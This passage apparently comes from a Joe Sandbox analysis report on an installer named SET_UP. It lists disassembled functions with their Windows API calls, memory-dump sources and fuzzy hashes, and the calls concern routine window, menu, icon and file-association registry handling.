                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91913C31A006199FCB18DFA9CA89AAEF7F6AF48304F14412EE611F7790D7B4A941CF14
                                                                                                                                                                                                  Function 00410372 Relevance: 16.7, APIs: 11, Instructions: 155windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00410377
                                                                                                                                                                                                    • Part of subcall function 0041054B: SendMessageW.USER32(?,00000403,00000000,00000000), ref: 00410557
                                                                                                                                                                                                  • ImageList_GetImageInfo.COMCTL32(?,00000000,?), ref: 0041039D
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000146,00000000,00000000), ref: 004103EF
                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041043A
                                                                                                                                                                                                  • GetTextExtentPoint32W.GDI32(?,?,?,?), ref: 0041046D
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000152,00000000,?), ref: 004104A3
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004104AD
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000154,00000000,00000000), ref: 004104BE
                                                                                                                                                                                                  • GetSystemMetrics.USER32(00000000), ref: 004104D6
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004104E1
                                                                                                                                                                                                  • SendMessageW.USER32(?,00000160,?,00000000), ref: 00410509
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MessageSend$ExtentImageMetricsPoint32SystemText$H_prologInfoList_RectWindow
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1228825044-0
                                                                                                                                                                                                  • Opcode ID: 24ddb03be673e0771f5019eed80e010c1f89ce6fc44cbf502a7fd3fe41896106
                                                                                                                                                                                                  • Instruction ID: c4085f2012dd36736d2a7a309dc7a43fee2ee331bbbc47648a453fc30da225e2
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24ddb03be673e0771f5019eed80e010c1f89ce6fc44cbf502a7fd3fe41896106
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F51F671A00219AFDB14DFA5CD81EEEBBB5FF08304F10452EE505A72A1DBB46E44CB64
                                                                                                                                                                                                  Function 004AC0C1 Relevance: 16.6, APIs: 11, Instructions: 107COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetWindowLongA.USER32(?,000000FC), ref: 004AC0DD
                                                                                                                                                                                                  • RemovePropA.USER32(?,?), ref: 004AC113
                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00000000), ref: 004AC119
                                                                                                                                                                                                  • RemovePropA.USER32(?,?), ref: 004AC147
                                                                                                                                                                                                  • SetWindowLongA.USER32(?,000000FC,00000000), ref: 004AC14D
                                                                                                                                                                                                  • GetWindow.USER32(?,00000005), ref: 004AC1A2
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004AC1B3
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Long$PropRemove
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3256693057-0
                                                                                                                                                                                                  • Opcode ID: e3822a0b86b5d7b9453c2b462f446bdf154f08cd03f778a2783d0da869f83ded
                                                                                                                                                                                                  • Instruction ID: 30631ea632bd8e89a25fdc6b1aa450c3c71374aca7deac532b5f27531986247d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3822a0b86b5d7b9453c2b462f446bdf154f08cd03f778a2783d0da869f83ded
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B1212C7B2155156AD7816774AC80E7F269CDBBB324B110236F504D3251FB698D034BBD
                                                                                                                                                                                                  Function 00431493 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 262COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: H_prolog
                                                                                                                                                                                                  • String ID: / $%02d:%02d.%d$%02d:%02d:%02d.%d$%d.%d$-00:00$-00:00 / 00:00$00:00$00:00 / 00:00
                                                                                                                                                                                                  • API String ID: 3519838083-2180132554
                                                                                                                                                                                                  • Opcode ID: ad224f9775064904f9bfc297eb062ddd9671fa1b947929d9045237d68e5d187d
                                                                                                                                                                                                  • Instruction ID: 46bb0925597853e3fc2f3a32a23d133604a0a38cb17d27f118d865c8fb8364a3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad224f9775064904f9bfc297eb062ddd9671fa1b947929d9045237d68e5d187d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97919EB1E01208EBCF14DBD9C985AEEBBB6AF58314F24402FF101A3251D7799A05CB69
                                                                                                                                                                                                  Function 004C5DC4 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 199registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004C6AF2
                                                                                                                                                                                                    • Part of subcall function 004B7F7C: GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 004B7F96
                                                                                                                                                                                                    • Part of subcall function 004B7F7C: GetShortPathNameW.KERNEL32(?,00000000,00000104), ref: 004B7FAE
                                                                                                                                                                                                  • RegQueryValueW.ADVAPI32(80000000,?,00000000,00000208), ref: 004C6CB0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Name$FileH_prologModulePathQueryShortValue
                                                                                                                                                                                                  • String ID: %s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$command$ddeexec
                                                                                                                                                                                                  • API String ID: 365916388-556638191
                                                                                                                                                                                                  • Opcode ID: c84257b50b0205e73b9d7b30bd0797bd147951fee474c5551f3f502af1b151ec
                                                                                                                                                                                                  • Instruction ID: 01b2e047186ede162486b104ca1b1d96aad3f0bd2543f889fa1aab9aa5747ac3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c84257b50b0205e73b9d7b30bd0797bd147951fee474c5551f3f502af1b151ec
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8716B71D0021AABCF00EBE5CD45FEEB7B9AF18344F10442EF515B6291EB796A04CB69
                                                                                                                                                                                                  Function 0041CA26 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 175windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0041CA2B
                                                                                                                                                                                                  • ExtractIconW.SHELL32(?,?,000000FF), ref: 0041CA75
                                                                                                                                                                                                  • DestroyIcon.USER32(00000000,?,?,.playlist,?,Playlist,00000001,00000020), ref: 0041CAA2
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Icon$DestroyExtractH_prolog
                                                                                                                                                                                                  • String ID: "%s" "%%1"$%s\DefaultIcon$%s\shell\open\%s$,%d$.playlist$command
                                                                                                                                                                                                  • API String ID: 786898281-3904124294
                                                                                                                                                                                                  • Opcode ID: 5a14a821efc9ef537dfc6cb07cecf17dec13fc726093915d43d3368e3ee2d957
                                                                                                                                                                                                  • Instruction ID: 4a196c615d8842c79cf5b057c93d1fd03fc8115f5814331a37412c92f4425407
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a14a821efc9ef537dfc6cb07cecf17dec13fc726093915d43d3368e3ee2d957
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4851F771A40249AFCF11EBB5CD95EEEBBB8AF14304F10442EF441A3291D77CAA48C769
                                                                                                                                                                                                  Function 004091A3 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 143windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004091A8
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004091FA
                                                                                                                                                                                                  • ClientToScreen.USER32(?,000000FF), ref: 00409257
                                                                                                                                                                                                  • PtInRect.USER32(?,000000FF,000000FF), ref: 00409267
                                                                                                                                                                                                  • GetSubMenu.USER32(00000000,00000001), ref: 004092AE
                                                                                                                                                                                                  • GetSubMenu.USER32(00000000,00000002), ref: 004092EC
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00409302
                                                                                                                                                                                                  • SetMenuDefaultItem.USER32(?,00008045,00000000), ref: 0040931E
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Menu$ClientRect$DefaultH_prologItemParentScreen
                                                                                                                                                                                                  • String ID: QL
                                                                                                                                                                                                  • API String ID: 1359895289-956036402
                                                                                                                                                                                                  • Opcode ID: 6667d42960165d10dea3f266c7dcd95b5ca8517207ad7bc9a6daf8e248842250
                                                                                                                                                                                                  • Instruction ID: 05286673b968c2188966ab13c5c3dadb2b69d29b6caa15989f4e679dcedb5759
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6667d42960165d10dea3f266c7dcd95b5ca8517207ad7bc9a6daf8e248842250
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1851AF71A00209ABDF109FA5CC4ABEEBBB5FF44324F04462EF512A62D1D7789D00CB54
                                                                                                                                                                                                  Function 004C1AA6 Relevance: 15.1, APIs: 10, Instructions: 138windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004BBB20: GetFocus.USER32 ref: 004BBB23
                                                                                                                                                                                                    • Part of subcall function 004BBB20: GetParent.USER32(00000000), ref: 004BBB4A
                                                                                                                                                                                                    • Part of subcall function 004BBB20: GetWindowLongW.USER32(?,000000F0), ref: 004BBB65
                                                                                                                                                                                                    • Part of subcall function 004BBB20: GetParent.USER32(?), ref: 004BBB73
                                                                                                                                                                                                    • Part of subcall function 004BBB20: GetDesktopWindow.USER32 ref: 004BBB77
                                                                                                                                                                                                    • Part of subcall function 004BBB20: SendMessageW.USER32(00000000,0000014F,00000000,00000000), ref: 004BBB8B
                                                                                                                                                                                                  • GetMenu.USER32(?), ref: 004C1B09
                                                                                                                                                                                                  • GetMenu.USER32(?), ref: 004C1B1D
                                                                                                                                                                                                  • GetMenuItemCount.USER32(00000000), ref: 004C1B26
                                                                                                                                                                                                  • GetSubMenu.USER32(00000000,00000000), ref: 004C1B37
                                                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 004C1B59
                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 004C1B7A
                                                                                                                                                                                                  • GetSubMenu.USER32(?,00000000), ref: 004C1B92
                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 004C1BAA
                                                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 004C1BE1
                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 004C1BFF
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Menu$Item$Count$ParentWindow$DesktopFocusLongMessageSend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4186786570-0
                                                                                                                                                                                                  • Opcode ID: 40a768e15c718dbd1365c2e8e35789065db74f1d80b9deed94d57bc1d95b3a45
                                                                                                                                                                                                  • Instruction ID: 2a75f65d847baf40f71d5d717dfa5d12071644a2e3772674a2d70654b5b16428
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 40a768e15c718dbd1365c2e8e35789065db74f1d80b9deed94d57bc1d95b3a45
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 875171389002059FDF51EFA5CD80FAEB7B4AF05354F20446EE511A6262E739ED51DF28
                                                                                                                                                                                                  Function 004C0A86 Relevance: 15.1, APIs: 10, Instructions: 102windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004C0AB3
                                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 004C0AC0
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 004C0ACD
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000036C,00000000,00000000), ref: 004C0AFC
                                                                                                                                                                                                  • GetWindow.USER32(00000000,00000002), ref: 004C0B0A
                                                                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004C0B32
                                                                                                                                                                                                  • GetWindow.USER32(00000000), ref: 004C0B39
                                                                                                                                                                                                  • IsWindowEnabled.USER32(00000000), ref: 004C0B42
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,0000036C,00000000,00000000), ref: 004C0B71
                                                                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 004C0B7D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$DesktopEnabledMessageSend$Enable
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2339141687-0
                                                                                                                                                                                                  • Opcode ID: ddbd2cb714d17c026b623ac1914fef8f6877489f4782cfd9edfb110b0473d10e
                                                                                                                                                                                                  • Instruction ID: 9e29642d00dc591e4a6c638ce07845ba6c62512efc0578981c3b63d083541a81
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ddbd2cb714d17c026b623ac1914fef8f6877489f4782cfd9edfb110b0473d10e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F31E435601315EFD7A1AFA29C05F6B7A5CAF01758F05003EFA00DA192EB68ED0186AD
                                                                                                                                                                                                  Function 004BCE54 Relevance: 15.1, APIs: 10, Instructions: 96COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • DefWindowProcW.USER32(?,00000046,00000000,?), ref: 004BCE6A
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004BCE81
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,?), ref: 004BCEBB
                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004BCECA
                                                                                                                                                                                                  • SetRect.USER32(?,?,00000000,?,?), ref: 004BCEE1
                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004BCEF0
                                                                                                                                                                                                  • SetRect.USER32(?,00000000,?,?,?), ref: 004BCF1B
                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004BCF26
                                                                                                                                                                                                  • SetRect.USER32(?,00000000,?,?,?), ref: 004BCF3D
                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004BCF48
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Rect$Invalidate$Window$Proc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 570070710-0
                                                                                                                                                                                                  • Opcode ID: d12f36800a37ba69f0051dcceeeb8089b9f31cef4a2c95104eaf7cfa70a1323b
                                                                                                                                                                                                  • Instruction ID: 327ccbd30b10629ed3e66498b9a6c30438f6d696f658986fd88cae2ed960fa91
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d12f36800a37ba69f0051dcceeeb8089b9f31cef4a2c95104eaf7cfa70a1323b
                                                                                                                                                                                                  • Instruction Fuzzy Hash: A231EC7151024ABFDB10CFA4DD88FAEBB7DFB14304F104165FA01A6190D771AE54DBA5
                                                                                                                                                                                                  Function 0040D333 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 128registryCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040D338
                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,Data\File Types,00509168,00000000), ref: 0040D3A5
                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,Data\File Types,00509168,00000000), ref: 0040D484
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.2021357980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021343825.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021411965.00000000004CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021433746.00000000004EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021451764.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.0000000000507000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021468738.000000000050D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.2021511426.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_SET_UP.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseEnumH_prolog
